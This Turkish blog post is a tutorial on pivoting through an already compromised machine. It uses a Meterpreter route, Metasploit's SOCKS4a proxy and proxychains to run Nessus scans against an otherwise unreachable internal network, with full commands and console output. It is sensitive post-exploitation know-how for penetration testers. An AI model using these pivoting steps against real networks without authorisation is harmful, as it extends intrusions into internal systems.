Menu
» » » » » » » Metasploit ile Sızılmış Sistemler Üzerinden Nessus Taraması


[*] Meterpreter session 1 opened (192.168.0.2:31337 -> 192.168.0.80:24592)

Hedef sisteme sızıldıktan sonra normalde direkt olarak erişilemeyen ağları bu sistem üzerinden Nessus ile taramak için şu adımlar takip edilir. Burada 192.168.0.2 makinesinden 192.168.0.80'e meterpreter oturumu açılmış, bu oturum üzerinden 10.1.1.0/24 ağı taranmak hedeflenmiştir.

msf exploit(handler) > route add 10.1.1.0 255.255.255.0 1
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) > 

Nessus'un SOCKS desteği olmadığı için MSF ile kurulan yukarıdaki proxy sunucusunu kullanmak için proxychains aracı kullanılabilir. Kullanılmadan önce /etc/proxychains.conf dosyası içerisinde şu eklenti yapılmalıdır.

socks4  127.0.0.1 1080

Yukarıdaki yapılandırma ile 1080. port kendisine gelen bütün paketleri meterpreter oturumu üzerinde tünelleyecektir. Bu adımdan sonra Nessus başlatılabilir.

# proxychains /usr/sbin/nessusd -D

İstismar edilen makine üzerinden tarama yapmak bağlantının durumuna göre çok uzun zaman alabileceğinden minimal policy ayarları ile taramayı yapmak en uygundur. Tarama komut satırından yapılabileceği gibi Nessus web arayüzünden de yapılabilir. MSF üzerinden Nessus taraması şu şekilde yapılabilir.

msf auxiliary(socks4a) > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf auxiliary(socks4a) > nessus_connect NESSUS_USER@localhost
[+] Password:
...
[*] Connecting to https://localhost:8834/ as NESSUS_USER
[*] Authenticated
msf auxiliary(socks4a) > nessus_policy_list
[+] Nessus Policy List

ID  Name        Comments
--  ----        --------
4   Minimal
3   noping
2   Web
1   All

msf auxiliary(socks4a) > nessus_scan_new 4 "Quick Windows" 10.1.1.2
[*] Creating scan from policy number 4, called "Quick Windows" and scanning 10.1.1.2
[*] Scan started.  uid is 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans

Scan ID                                               Name           Status   Current Hosts  Total Hosts
-------                                               ----           ------   -------------  -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee  Quick Windows  running  0              1

[*] You can:
[+]             Import Nessus report to database :      nessus_report_get <reportid>
[+]             Pause a nessus scan :                   nessus_scan_pause <scanid>

Tarama sonucunda elde edilen raporun MSF'ye aktarılması ve hosts komutu ile isteğe göre süzülmesi mümkündür.

msf auxiliary(socks4a) >  nessus_report_get 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] importing 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] 10.1.1.2   Done!                                        
[+] Done

Kaynak

Posted by
Labels: , , , , ,

Share to:

at 5:10 AM

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Top